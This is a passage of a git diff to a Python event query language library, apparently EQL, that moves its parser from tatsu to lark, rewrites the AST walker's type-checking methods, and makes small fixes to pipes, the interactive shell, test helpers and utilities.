<=, >, >= are only supported for strings or integers @@ -495,12 +559,12 @@ def walk__comparison(self, node): # string to string or number to number if not ((types.check_full_hint(types.STRING, lt) and types.check_full_hint(types.STRING, rt)) or (types.check_full_hint(types.NUMBER, lt) and types.check_full_hint(types.NUMBER, rt))): - raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + raise self._type_error(node, error_message, types.clear(left_type), types.clear(right_type)) comp_node = ast.Comparison(left, op, right) hint = types.get_specifier(types.union(left_type, right_type)), types.get_type(types.BOOLEAN) - # there is no special comparator for wildcards, just look for * in the string + # there is no special comparison operator for wildcards, just look for * in the string if isinstance(right, ast.String) and '*' in right.value: func_call = ast.FunctionCall('wildcard', [left, right]) @@ -509,40 +573,91 @@ def walk__comparison(self, node): elif op == ast.Comparison.NE: return ~ func_call, hint - return comp_node, hint + return comp_node.optimize(), hint - def walk__and_terms(self, node): + def mathop(self, node): """Callback function to walk the AST.""" - terms, hints = self.walk(node.terms, split=True) + output, output_type = self.visit(node.children[0]) + + def update_type(error_node, new_op, new_type): + if not types.check_types(types.NUMBER, new_type): + raise self._type_error(error_node, "Unable to {func} {actual_type}", + types.NUMBER, new_type, func=ast.MathOperation.func_lookup[new_op]) + + output_spec = types.get_specifier(output_type) + + if types.check_types(types.NULL, types.union(output_type, new_type)): + return output_spec, types.union_types(types.BASE_NULL, types.BASE_NUMBER) + else: + return output_spec, types.BASE_NUMBER + + # update the type hint to strip non numeric information + output_type = update_type(node.children[0], node.children[1], output_type) + + for op_token, current_node in zip(node.children[1::2], node.children[2::2]): + op = op_token.value + right, current_hint = self.visit(current_node) + output_type = update_type(current_node, op, current_hint) + + # determine if this could have a null in it from a divide by 0 + if op in "%/" and (not isinstance(right, ast.Literal) or right.value == 0): + current_hint = types.union(current_hint, types.NULL) + + output = ast.MathOperation(output, op, right).optimize() + output_type = update_type(current_node, op, current_hint) + + if isinstance(output, ast.Literal): + output_type = types.get_specifier(output), output.type_hint + + return output, output_type + + sum_expr = mathop + mul_expr = mathop + + def bool_expr(self, node, cls): + """Method for both and, or expressions.""" + terms, hints = self.unzip_hints(self.visit_children(node)) + if not self._implied_booleans: - for tatsu_node, hint in zip(node.terms, hints): + for lark_node, hint in zip(node.child_trees, hints): if not types.check_types(types.BOOLEAN, hint): - raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", + raise self._type_error(lark_node, "Expected {expected_type}, not {actual_type}", types.BOOLEAN, hint) - term = ast.And(terms) + term = cls(terms).optimize() return term, types.union(*hints) - def walk__or_terms(self, node): + def and_expr(self, node): """Callback function to walk the AST.""" - terms, hints = self.walk(node.terms, split=True) - if not self._implied_booleans: - for tatsu_node, hint in zip(node.terms, hints): - if not types.check_types(types.BOOLEAN, hint): - raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", - types.BOOLEAN, hint) - term = ast.Or(terms) - return term, types.union(*hints) + return self.bool_expr(node, ast.And) - def walk__not_term(self, node): + def or_expr(self, node): """Callback function to walk the AST.""" - term, hint = self.walk(node.t) - return ~ term, types.union(hint) + return self.bool_expr(node, ast.Or) - def walk__in_set(self, node): + def not_expr(self, node): """Callback function to walk the AST.""" - expr, outer_hint = self.walk(node.expr) - container, sub_hints = self.walk(node.container, keep_hint=True, split=True) + term, hint = self.visit(node.children[-1]) + + if not self._implied_booleans: + if not types.check_types(types.BOOLEAN, hint): + raise self._type_error(node.child_trees[-1], "Expected {expected_type}, not {actual_type}", + types.BOOLEAN, hint) + + if len(node.get_list("NOT_OP")) % 2 == 1: + term = ~ term + hint = types.get_specifier(hint), types.BASE_BOOLEAN + + return term, hint + + def not_in_set(self, node): + """Method for converting `x not in (...)`.""" + rv, rv_hint = self.in_set(node) + return ~(rv.optimize()), rv_hint + + def in_set(self, node): + """Callback function to walk the AST.""" + (expr, outer_hint), (container, sub_hints) = self.visit_children(node) outer_spec = types.get_specifier(outer_hint) outer_type = types.get_type(outer_hint) container_specifiers = [types.get_specifier(h) for h in sub_hints] @@ -550,12 +665,12 @@ def walk__in_set(self, node): # Check that everything inside the container has the same type as outside error_message = "Unable to compare {expected_type} to {actual_type}" - for container_node, node_type in zip(node.container, container_types): + for container_node, node_type in zip(node["expressions"].children, container_types): if not types.check_types(outer_type, node_type): raise self._type_error(container_node, error_message, outer_type, node_type) # This will always evaluate to true/false, so it should be a boolean - term = ast.InSet(expr, container) + term = ast.InSet(expr, container).optimize() return term, (types.union_specifiers(outer_spec, *container_specifiers), types.BASE_BOOLEAN) def _get_type_hint(self, node, ast_node): @@ -582,7 +697,7 @@ def _get_type_hint(self, node, ast_node): type_hint = types.union(type_hint, types.NULL) elif isinstance(ast_node, ast.FunctionCall): - signature = self._function_lookup.get(node.name) + signature = self._function_lookup.get(ast_node.name) if signature: type_hint = signature.return_value @@ -591,30 +706,54 @@ def _get_type_hint(self, node, ast_node): return type_hint - def walk__function_call(self, node): + def function_call(self, node, prev_node=None, prev_arg=None): """Callback function to walk the AST.""" - if node.name in self.preprocessor.macros: - args = [] + function_name = self.visit(node["name"]) + argument_nodes = [] + args = [] + hints = [] + + # if the base is chained from a previous function call, use that node + if prev_arg: + base_arg, base_hint = prev_arg + args.append(base_arg) + hints.append(base_hint) + + if prev_node: + argument_nodes.append(prev_node) - if node.args: - args, hints = self.walk(node.args, split=True) + if "expressions" in node: + argument_nodes.extend(node["expressions"].children) - macro = self.preprocessor.macros[node.name] + if function_name in self.preprocessor.macros: + if prev_node and not prev_arg: + arg, hint = self.visit(prev_node) + args.append(arg) + hints.append(hint) + + if node["expressions"]: + args[len(args):], hints[len(hints):] = self.visit(node["expressions"]) + + macro = self.preprocessor.macros[function_name] expanded = macro.expand(args) type_hint = self._get_type_hint(node, expanded) return expanded, type_hint - elif node.name in self.new_preprocessor.macros: - args = [] + elif function_name in self.new_preprocessor.macros: + if prev_node and not prev_arg: + arg, hint = self.visit(prev_node) + args.append(arg) + hints.append(hint) + + if node["expressions"]: + args[len(args):], hints[len(hints):] = self.visit(node["expressions"]) - if node.args: - args, hints = self.walk(node.args, split=True) - macro = self.new_preprocessor.macros[node.name] + macro = self.new_preprocessor.macros[function_name] expanded = macro.expand(args) type_hint = self._get_type_hint(node, expanded) return expanded, type_hint - signature = self._function_lookup.get(node.name) + signature = self._function_lookup.get(function_name) if signature: # Check for any variables in the signature, and handle their type hints differently @@ -627,33 +766,29 @@ def walk__function_call(self, node): # Get all of the arguments first, because they may depend on others # and we need to pull out all of the variables - for idx, arg_node in enumerate(node.args or []): - if idx in variables: - exc = self._type_error(arg_node, "Invalid argument to {name}. Expected {expected_type}", - types.VARIABLE, name=node.name) - - if arg_node.parseinfo.rule == 'field': - try: - arguments.append(self.walk(arg_node, get_variable=True)) - except EqlTypeMismatchError: - pass - else: - continue - - # Ignore the original exception and raise our own, which has the function name in it - raise exc + for idx, arg_node in enumerate(argument_nodes): + if idx in variables: + if arg_node.data == "base_field": + variable_name = self.visit(arg_node["name"]) + self._add_variable(variable_name) + arguments.append((ast.Field(variable_name), types.VARIABLE)) + else: + raise self._type_error(arg_node, "Invalid argument to {name}. Expected {expected_type}", + types.VARIABLE, name=function_name) + elif idx == 0 and prev_arg: + arguments.append(prev_arg) else: - arguments.append(self.walk(arg_node)) + arguments.append(self.visit(arg_node)) # Then validate this against the signature - args, hints = transpose(arguments) + args, hints = self.unzip_hints(arguments) # In theory, we could do another round of validation for generics, but we'll just assume # that loop variables can take any shape they need to, as long as the other arguments match # Validate that the arguments match the function signature by type and length - args, hints = self.validate_signature(node, signature, args, hints) + args, hints = self.validate_signature(node, signature, argument_nodes, args, hints) # Restore old variables, since ours are out of scope now self._var_types = old_variables @@ -664,61 +799,77 @@ def walk__function_call(self, node): if hints and types.is_dynamic(types.union(*hints)): output_hint = types.dynamic(output_hint) - return ast.FunctionCall(node.name, args), output_hint + return ast.FunctionCall(function_name, args, as_method=prev_node is not None), output_hint elif self._check_functions: - raise self._error(node, "Unknown function {name}", width=len(node.name)) + raise self._error(node["name"], "Unknown function {NAME}") else: args = [] - if node.args: - args, _ = self.walk(node.args, split=True) + if node["expressions"]: + args, _ = self.visit(node["expressions"]) - return ast.FunctionCall(node.name, args), types.dynamic(types.EXPRESSION) + func_node = ast.FunctionCall(function_name, args, as_method=prev_node is not None) + return func_node, types.dynamic(types.EXPRESSION) # queries - def walk__event_query(self, node): + def event_query(self, node): """Callback function to walk the AST.""" - if node.ast.get('event_type') is None: + if node["name"] is None: event_type = EVENT_TYPE_ANY if not self.implied_any: raise self._error(node, "Missing event type and 'where' condition") else: - event_type = node.event_type + event_type = self.visit(node["name"]) if self._schema and not self._schema.validate_event_type(event_type): - raise self._error(node, "Invalid event type: {event_type}", cls=EqlSchemaError, width=len(event_type)) + raise self._error(node["name"], "Invalid event type: {NAME}", cls=EqlSchemaError, width=len(event_type)) + + with self.scoped(event_type=event_type, query_condition=True): + expr, hint = self.visit(node.children[-1]) + if not self._implied_booleans and not types.check_types(types.BOOLEAN, hint): + raise self._type_error(node.children[-1], "Expected {expected_type} not {actual_type}", + types.BOOLEAN, hint) - condition = self.walk(node.cond, event_type=event_type, query_condition=True) - return ast.EventQuery(event_type, condition) + return ast.EventQuery(event_type, expr) - def walk__pipe(self, node): + def pipe(self, node): """Callback function to walk the AST.""" if not self._pipes_enabled: raise self._error(node, "Pipes not supported") - pipe_cls = ast.PipeCommand.lookup.get(node.name) - if pipe_cls is None or node.name not in self._allowed_pipes: - raise self._error(node, "Unknown pipe {name}", width=len(node.name)) + pipe_name = self.visit(node["name"]) + pipe_cls = ast.PipeCommand.lookup.get(pipe_name) + if pipe_cls is None or pipe_name not in self._allowed_pipes: + raise self._error(node["name"], "Unknown pipe {NAME}") args = [] hints = [] + arg_nodes = [] - if node.args: - args, hints = self.walk(node.args, split=True) + if node["expressions"]: + arg_nodes = node["expressions"].children + args, hints = self.visit(node["expressions"]) + elif len(node.children) > 1: + arg_nodes = node.children[1:] + args, hints = self.unzip_hints(self.visit(c) for c in node.children[1:]) - args, hints = self.validate_signature(node, pipe_cls, args, hints) + args, hints = self.validate_signature(node, pipe_cls, arg_nodes, args, hints) self._pipe_schemas = pipe_cls.output_schemas(args, hints, self._pipe_schemas) return pipe_cls(args) - def walk__piped_query(self, node): + def base_query(self, node): + """Visit a sequence, join or event query.""" + return self.visit(node.children[0]) + + def piped_query(self, node): """Callback function to walk the AST.""" - if node.query is None: + if "base_query" in node: + first = self.visit(node["base_query"]) + elif self.implied_base: first = ast.EventQuery(EVENT_TYPE_ANY, ast.Boolean(True)) - if not self.implied_base: - raise self._error(node, "Missing base query") else: - first = self.walk(node.query) + raise self._error(node, "Missing base query") self._in_pipes = True if isinstance(first, ast.EventQuery): @@ -736,63 +887,82 @@ def walk__piped_query(self, node): else: self._pipe_schemas.append(Schema({EVENT_TYPE_GENERIC: {}})) - return ast.PipedQuery(first, self.walk(node.pipes)) + return ast.PipedQuery(first, self.visit_children(node["pipes"])) + + def expressions(self, node): + """Convert a list of expressions.""" + expressions = self.visit_children(node) + # Split out return types and the hints + return self.unzip_hints(expressions) + + def named_subquery(self, node): + """Callback function to walk the AST.""" + name = self.visit(node["name"]) - def walk__subquery_type(self, node): - """Get the subquery type.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") elif self._in_pipes: raise self._error(node, "Not supported within pipe") + elif name not in ast.NamedSubquery.supported_types: + raise self._error(node["name"], "Unknown subquery type '{NAME} of'") - if node.name not in ast.NamedSubquery.supported_types: - raise self._error(node, "Unknown subquery type '{name} of'") + query = self.visit(node["subquery"]["event_query"]) + return ast.NamedSubquery(name, query), types.dynamic(types.BOOLEAN) - return node.name - - def walk__named_query(self, node): + def named_params(self, node, get_param=None, position=None, close=None): """Callback function to walk the AST.""" - return ast.NamedSubquery(self.walk(node.stype), self.walk(node.query)), types.dynamic(types.BOOLEAN) + if node is None: + return ast.NamedParams({}) - def walk__named_params(self, node, get_param=None, position=None, close=None): - """Callback function to walk the AST.""" params = OrderedDict() - if get_param is None and len(node.params) > 0: - raise self._error(node, "Unexpected parameters") + if get_param is None and len(node.children) > 0: + raise self._error(node.children[0], "Unexpected parameters") - for param in node.params: + for param in node.children: key, value = get_param(param, position=position, close=close) if key in params: - raise self._error(param, "Repeated parameter {k}") + raise self._error(param, "Repeated parameter {name}") params[key] = value return ast.NamedParams(params) - def walk__subquery_by(self, node, num_values=None, position=None, close=None, get_param=None): + def subquery_by(self, node, num_values=None, position=None, close=None, get_param=None): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") - if num_values is not None and num_values != len(node.join_values): - if len(node.join_values) == 0: - error_node = node.query + actual_num = len(node["join_values"]["expressions"].children) if node["join_values"] else 0 + if num_values is not None and num_values != actual_num: + if actual_num == 0: + error_node = node end = True else: end = False - error_node = node.join_values[max(num_values, len(node.join_values)) - 1] + error_node = node["join_values"]["expressions"].children[max(num_values, actual_num) - 1] message = "Expected {num} value" if num_values != 1: message += "s" raise self._error(error_node, message, num=num_values, end=end) - params = self.walk(node.params, get_param=get_param, position=position, close=close) - query = self.walk(node.query) - if node.join_values: - join_values, join_hints = self.walk(node.join_values, event_type=query.event_type, split=True) + if node["named_params"]: + params = self.named_params(node["named_params"], + get_param=get_param, position=position, close=close) + else: + params = ast.NamedParams() + + query = self.visit(node["subquery"]["event_query"]) + + if node["join_values"]: + with self.scoped(event_type=query.event_type): + join_values, join_hints = self.visit(node["join_values"]) else: join_values, join_hints = [], [] return ast.SubqueryBy(query, params, join_values), join_hints - def walk__join(self, node): + def join_values(self, node): + """Return all of the expressions.""" + return self.visit(node["expressions"]) + + def join(self, node): """Callback function to walk the AST.""" queries, close = self._get_subqueries_and_close(node) return ast.Join(queries, close) @@ -804,14 +974,15 @@ def _get_subqueries_and_close(self, node, get_param=None): raise self._error(node, "Subqueries not supported") # Figure out how many fields are joined by in the first query, and match across all - first, first_hints = self.walk(node.queries[0], get_param=get_param, position=0) + subquery_nodes = node.get_list("subquery_by") + first, first_hints = self.subquery_by(subquery_nodes[0], get_param=get_param, position=0) num_values = len(first.join_values) queries = [(first, first_hints)] - for pos, query in enumerate(node.queries[1:], 1): - queries.append(self.walk(query, num_values=num_values, get_param=get_param, position=pos)) + for pos, query in enumerate(subquery_nodes[1:], 1): + queries.append(self.subquery_by(query, num_values=num_values, get_param=get_param, position=pos)) - shared = node.ast.get('shared_by') + shared = node['join_values'] close = None # Validate that each field has matching types @@ -819,7 +990,7 @@ def _get_subqueries_and_close(self, node, get_param=None): strict_hints = [default_hint] * num_values if shared: - strict_hints += [default_hint] * len(shared) + strict_hints += [default_hint] * len(shared["expressions"].children) def check_by_field(by_pos, by_node, by_hint): # Check that the possible values for our field that match what we currently understand about this type @@ -834,13 +1005,20 @@ def check_by_field(by_pos, by_node, by_hint): for qpos, (query, query_by_hints) in enumerate(queries): unshared_fields = [] curr_by_hints = query_by_hints - curr_join_nodes = node.queries[qpos].join_values + query_node = subquery_nodes[qpos] + + if "join_values" in query_node: + curr_join_nodes = query_node["join_values"]["expressions"].children + else: + curr_join_nodes = [] if shared: - curr_shared_by, curr_shared_hints = self.walk(shared, event_type=query.query.event_type, split=True) + with self.scoped(event_type=query.query.event_type): + curr_shared_by, curr_shared_hints = self.visit(shared) + curr_by_hints = curr_shared_hints + curr_by_hints query.join_values = curr_shared_by + query.join_values - curr_join_nodes = shared + curr_join_nodes + curr_join_nodes = shared['expressions'].children + curr_join_nodes # Now that they've all been built out, start to intersect the types for fpos, (n, h) in enumerate(zip(curr_join_nodes, curr_by_hints)): @@ -849,34 +1027,45 @@ def check_by_field(by_pos, by_node, by_hint): # Add all of the fields to the beginning of this subquery's BY fields and preserve the order query.join_values = unshared_fields + query.join_values - if node.ast.get("until"): - close, close_hints = self.walk(node.until, num_values=num_values, get_param=get_param, close=True) - close_nodes = [node.until] + until_node = node["until_subquery_by"] + + if until_node: + close, close_hints = self.subquery_by(until_node["subquery_by"], + num_values=num_values, get_param=get_param, close=True) + close_nodes = [until_node["subquery_by"]] if shared: - shared_by, shared_hints = self.walk(node.shared_by, event_type=close.query.event_type, split=True) + with self.scoped(event_type=close.query.event_type): + shared_by, shared_hints = self.visit(shared) + close_hints = close_hints + shared_hints close.join_values = shared_by + close.join_values - close_nodes = shared + close_nodes + close_nodes = shared['expressions'].children + close_nodes # Check the types of the by field for fpos, (n, h) in enumerate(zip(close_nodes, close_hints)): check_by_field(fpos, n, h) # Unzip the queries from the (query, hint) tuples - queries, _ = zip(*queries) + queries, _ = self.unzip_hints(queries) return list(queries), close def get_sequence_parameter(self, node, **kwargs): """Validate that sequence parameters are working.""" - key, (value, value_hint) = self.walk([node.k, node.v]) - value = ast.TimeRange.convert(value) + key = self.visit(node["name"]) + + if len(node.children) > 1: + value, _ = self.visit(node.children[-1]) + else: + value = ast.Boolean(True) if key != 'maxspan': raise self._error(node, "Unknown sequence parameter {}".format(key)) - if not ast.TimeRange.convert(value) or value.delta < datetime.timedelta(0): - error_node = node.v if isinstance(node.v, tatsu.objectmodel.Node) else node + value = ast.TimeRange.convert(value) + + if not value or value.delta < datetime.timedelta(0): + error_node = node["time_range"] or node["atom"] or node raise self._error(error_node, "Invalid value for {}".format(key)) return key, value @@ -888,9 +1077,10 @@ def get_sequence_term_parameter(self, param_node, position, close): # set the default type to a literal 'true' value, type_hint = ast.Boolean(True), types.literal(types.BOOLEAN) - key = self.walk(param_node.k) - if param_node.ast.get('v'): - value, type_hint = self.walk(param_node.v) + key = self.visit(param_node["name"]) + + if len(param_node.children) > 1: + value, type_hint = self.visit(param_node.children[-1]) if key == 'fork': if not types.check_types(types.literal((types.NUMBER, types.BOOLEAN)), type_hint): @@ -902,58 +1092,49 @@ def get_sequence_term_parameter(self, param_node, position, close): raise self._error(param_node, "Invalid value for {k}") else: - raise self._error(param_node, "Unknown parameter {k}") + raise self._error(param_node['name'], "Unknown parameter {NAME}") return key, ast.Boolean(bool(value.value)) - def walk__sequence(self, node): + def sequence(self, node): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") params = None - if node.ast.get('params'): - params = self.walk(node.params, get_param=self.get_sequence_parameter) + if node['named_params']: + params = self.named_params(node['named_params'], get_param=self.get_sequence_parameter) queries, close = self._get_subqueries_and_close(node, get_param=self.get_sequence_term_parameter) return ast.Sequence(queries, params, close) + def definitions(self, node): + """Parse all definitions.""" + return self.visit_children(node) + # definitions - def walk__macro(self, node): + def macro(self, node): """Callback function to walk the AST.""" - definition = ast.Macro(node.name, node.params, self.walk(node.body)) + definition = ast.Macro(self.visit(node.children[0]), + self.visit(node.children[1:-1]), + self.visit(node.children[-1])[0]) self.new_preprocessor.add_definition(definition) return definition - def walk__constant(self, node): + def constant(self, node): """Callback function to walk the AST.""" - value, _ = self.walk(node.value) - definition = ast.Constant(node.name, value) + name = self.visit(node["name"]) + value, _ = self.visit(node["literal"]) + definition = ast.Constant(name, value) self.new_preprocessor.add_definition(definition) return definition -def _build_parser(): - """Build a parser one-time. These appear to be thread-safe so this only needs to happen once.""" - global GRAMMAR, compiled_parser - - if compiled_parser is not None: - return compiled_parser - - with compiler_lock: - if compiled_parser is None: - GRAMMAR = get_etc_file('eql.ebnf') - compiled_parser = tatsu.compile(GRAMMAR, parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) - - return compiled_parser - - -def _get_parser(): - """Try to get a thread-safe parser, and compile if necessary.""" - if not hasattr(local, "parser"): - local.parser = _build_parser() - return local.parser +lark_parser = Lark(get_etc_file('eql.g'), debug=False, + propagate_positions=True, tree_class=KvTree, parser='lalr', + start=['piped_query', 'definition', 'definitions', + 'query_with_definitions', 'expr', 'signed_single_atom']) def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base=False, pipes=True, subqueries=True): @@ -970,53 +1151,43 @@ def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base= :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: EqlNode """ - parser = _get_parser() - if not text.strip(): raise EqlParseError("No text specified", 0, 0, text) # Convert everything to unicode text = to_unicode(text) + if not text.endswith("\n"): + text += "\n" with ParserConfig(implied_any=implied_any, implied_base=implied_base, allow_subqueries=subqueries, preprocessor=preprocessor, allow_pipes=pipes) as cfg: - walker = EqlWalker() load_extensions(force=False) exc = None + walker = LarkToEQL(text) try: - model = parser.parse(text, rule_name=start, start=start, parseinfo=True) - eql_node = walker.walk(model) - if not isinstance(eql_node, ast.EqlNode) and isinstance(eql_node, tuple): - eql_node, type_hint = eql_node - return eql_node - except EqlError as e: - # If full traceback mode is enabled, then re-raise the exception + tree = lark_parser.parse(text, start=start) + except LarkError as e: + # Remove the original exception from the traceback + exc = EqlSyntaxError("Invalid syntax", e.line - 1, e.column - 1, '\n'.join(walker.lines[e.line - 2:e.line])) if cfg.read_stack("full_traceback", debugger_attached): - raise - exc = e - except tatsu.exceptions.FailedParse as e: - # Remove the tatsu exception from the traceback - exc = e - - if isinstance(exc, EqlError): - # at this point, the full traceback isn't wanted, so raise it from here - raise exc + raise exc - if isinstance(exc, tatsu.exceptions.FailedParse): - info = exc.buf.line_info(exc.pos) - message = 'Invalid syntax' - line = info.line - col = info.col + if exc is None: + try: + eql_node = walker.visit(tree) + if not isinstance(eql_node, ast.EqlNode) and isinstance(eql_node, tuple): + eql_node, type_hint = eql_node + return eql_node + except EqlError as e: + # If full traceback mode is enabled, then re-raise the exception + if cfg.read_stack("full_traceback", debugger_attached): + raise + exc = e - source = info.text.rstrip() - if not source: - source = text.rstrip().splitlines()[-1].rstrip() - col = max(len(source) - 1, 0) - - # Raise an EQL error instead - raise EqlSyntaxError(message, line, col, source) + # Python 3 - avoid double exceptions if full_traceback is disabled + raise exc def parse_base_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True): @@ -1064,8 +1235,7 @@ def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: PipedQuery """ - rule = "cli_query" if cli else "single_query" - return _parse(text, rule, implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, + return _parse(text, "piped_query", implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, subqueries=subqueries, pipes=pipes) @@ -1080,18 +1250,17 @@ def parse_expression(text, implied_any=False, preprocessor=None, subqueries=True :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: Expression """ - return _parse(text, start='single_expression', - implied_any=implied_any, preprocessor=preprocessor, subqueries=subqueries) + return _parse(text, start='expr', implied_any=implied_any, preprocessor=preprocessor, subqueries=subqueries) def parse_atom(text, cls=None): # type: (str, type) -> ast.Field|ast.Literal """Parse and get an atom.""" - rule = "single_atom" - atom = _parse(text, start="single_atom") + rule = "signed_single_atom" + atom = _parse(text, start=rule) if cls is not None and not isinstance(atom, cls): - walker = EqlWalker() - tatsu_ast = _get_parser().parse(text, rule_name=rule, start=rule, parseinfo=True) - raise walker._error(tatsu_ast, "Expected {expected} not {actual}", + walker = LarkToEQL(text) + lark_tree = lark_parser.parse(text, start=rule) + raise walker._error(lark_tree, "Expected {expected} not {actual}", expected=cls.__name__.lower(), actual=type(atom).__name__.lower()) return atom @@ -1143,7 +1312,7 @@ def parse_definition(text, preprocessor=None, implied_any=False, subqueries=True :param bool subqueries: Toggle support for subqueries (sequence, join, named of, etc.) :rtype: Definition """ - return _parse(text, start='single_definition', preprocessor=preprocessor, + return _parse(text, start='definition', preprocessor=preprocessor, implied_any=implied_any, subqueries=subqueries) @@ -1182,3 +1351,42 @@ def get_preprocessor(text, implied_any=False, subqueries=None, preprocessor=None new_preprocessor.add_definitions(definitions) return new_preprocessor + + +class TermExtractor(Interpreter, object): + """Extract query terms from a sequence, join or flat query.""" + + def __init__(self, text): + self.text = text + + def event_query(self, tree): + return self.text[tree.meta.start_pos:tree.meta.end_pos] + + def piped_query(self, tree): + """Extract all terms.""" + if tree["base_query"]: + if tree["base_query"]["event_query"]: + return [self.visit(tree["base_query"]["event_query"])] + return self.visit(tree["base_query"].children[0]) + return [] + + def sequence(self, tree): + """Extract the terms in the sequence.""" + return [self.visit(term["subquery"]["event_query"]) for term in tree.get_list("subquery_by")] + + # these have similar enough ASTs that this is fine for extracting terms + join = sequence + + +def extract_query_terms(text, **kwargs): + """Parse out the query terms from an event query, join or sequence. + + :param str text: EQL source text to parse + :rtype: list[str] + """ + # validate that it parses first so that EQL exceptions are raised + parse_query(text, **kwargs) + + tree = lark_parser.parse(text, start="piped_query") + extractor = TermExtractor(text) + return list(extractor.visit(tree)) diff --git a/eql/pipes.py b/eql/pipes.py index 529d601..26b8cc6 100644 --- a/eql/pipes.py +++ b/eql/pipes.py @@ -1,7 +1,7 @@ """EQL Pipes.""" from .ast import PipeCommand, TimeRange -from .schema import Schema, EVENT_TYPE_GENERIC -from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type +from .schema import Schema, EVENT_TYPE_GENERIC, MIXED_TYPES +from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type, BASE_STRING from .utils import is_string __all__ = ( @@ -41,10 +41,12 @@ class CountPipe(ByPipe): def output_schemas(cls, arguments, type_hints, event_schemas): # type: (list, list, list[Schema]) -> list[Schema] """Generate the output schema and determine the ``key`` field dyanmically.""" + if type_hints is None: + type_hints = [MIXED_TYPES for _ in arguments] base_hints = [get_type(t) for t in type_hints] - base_hints = ["mixed" if not is_string(t) else t for t in base_hints] + base_hints = [MIXED_TYPES if not is_string(t) else t for t in base_hints] if len(arguments) == 0: - key_hint = "string" + key_hint = BASE_STRING elif len(arguments) == 1: key_hint = base_hints[0] else: @@ -123,7 +125,7 @@ class UniquePipe(ByPipe): class UniqueCountPipe(ByPipe): """Returns unique results but adds a count field.""" - minimum_args = 0 + minimum_args = 1 @classmethod def output_schemas(cls, arguments, type_hints, event_schemas): diff --git a/eql/shell.py b/eql/shell.py index d0aec82..718da75 100644 --- a/eql/shell.py +++ b/eql/shell.py @@ -16,7 +16,7 @@ from .engine import PythonEngine from .errors import EqlSyntaxError, EqlParseError from .functions import list_functions -from .parser import parse_query, _get_parser, allow_enum_fields +from .parser import parse_query, keywords, allow_enum_fields from .pipes import list_pipes, CountPipe from .schema import Schema, EVENT_TYPE_ANY, EVENT_TYPE_GENERIC from .table import Table @@ -65,8 +65,11 @@ PYREADLINE = "pyreadline" GNUREADLINE = "gnureadline" -# Determine the input function that should be used for the prompt -input_func = getattr(__builtins__, "raw_input", input) +# Determine the input function that should be used for the prompt in a python2 and python3 compatible way +try: + input_func = raw_input +except NameError: + input_func = input # Determine which version of readline is installed for module in ["readline", "gnureadline"]: @@ -209,23 +212,22 @@ def get_keywords(cls, force=False): """Get the EQL keywords.""" if force or not cls.__eql_keywords: wordlist = set() - parser = _get_parser() - keywords = set(parser.keywords) + updated_keywords = set(keywords) - keywords.remove("in") - keywords.add("in (") + updated_keywords.remove("in") + updated_keywords.add("in (") wordlist.update(["true", "false", "null"]) - keywords.remove("with") + updated_keywords.remove("with") wordlist.update(["with maxspan=", "fork=true"]) wordlist.update("{}(".format(f) for f in list_functions()) wordlist.update("| {}".format(p) for p in list_pipes()) - keywords.remove("of") + updated_keywords.remove("of") wordlist.update(["{} of [".format(k) for k in NamedSubquery.supported_types]) - wordlist.update(keywords) + wordlist.update(updated_keywords) cls.__eql_keywords = list(sorted(wordlist)) return cls.__eql_keywords @@ -442,7 +444,7 @@ def help_search(self, *args): def do_search(self, search_text): """Run an EQL search over the input data.""" - search_lines = search_text.splitlines(keepends=False) + search_lines = search_text.splitlines(False) self.multiline = False # if only "search" is typed in, then keep prompting @@ -463,7 +465,7 @@ def do_search(self, search_text): # check if the query is fully valid, but spans multiple lines # we want to keep prompting until we see a semicolon, or two blank lines - if len(self.lastcmd.splitlines(keepends=True)) > 1: + if len(self.lastcmd.splitlines(True)) > 1: if not search_text.endswith(";") and self.empty_count < 2: self.multiline = True return diff --git a/eql/tests/base.py b/eql/tests/base.py index 2b19fc6..8af9a97 100644 --- a/eql/tests/base.py +++ b/eql/tests/base.py @@ -47,16 +47,23 @@ def get_events(cls): cls.__events = [Event.from_data(d) for d in data] return cls.__events + @classmethod + def filter_queries(cls, q): + """Helper method for filtering the test queries for subclasses.""" + return True + @classmethod def get_example_queries(cls): """Get example queries with their expected outputs.""" with open(cls.queries_file, "r") as f: - queries = list(q for _, q in sorted(toml.load(f)["queries"].items())) - for q in queries: + queries = [] + for q in toml.load(f)["queries"]: analytic = cls.get_analytic(q['query']) analytic.metadata['_info'] = q.copy() q['analytic'] = analytic - return [q for q in queries if cls.engine_name not in q.get('skip', [])] + queries.append(q) + + return list(filter(cls.filter_queries, queries)) @classmethod def get_example_analytics(cls): diff --git a/eql/utils.py b/eql/utils.py index 841f10c..d2bb2db 100644 --- a/eql/utils.py +++ b/eql/utils.py @@ -46,7 +46,7 @@ def is_string(s): def is_number(n): """Check if a python object is a unicode or ascii string.""" - return isinstance(n, numbers) + return isinstance(n, numbers) and not isinstance(n, bool) def is_array(a): @@ -226,7 +226,10 @@ def is_stateful(query): from . import ast # noqa: E402 from . import pipes # noqa: E402 - if not isinstance(query, ast.EqlNode): + if isinstance(query, ast.EqlAnalytic): + query = query.query + + elif not isinstance(query, ast.EqlNode): raise TypeError("unsupported type {} to is_stateful. Expected {}".format(type(query), ast.EqlNode)) stateful_nodes = ( @@ -280,6 +283,23 @@ def match_kv(condition): return and_node +def get_output_types(query): + """Get the output event types for a query.""" + from .walkers import RecursiveWalker + from .ast import EqlAnalytic, PipedQuery + + if isinstance(query, EqlAnalytic): + query = query.query + + elif not isinstance(query, PipedQuery): + raise TypeError("unsupported type {} to get_output_types. Expected {}".format(type(query), PipedQuery)) + + 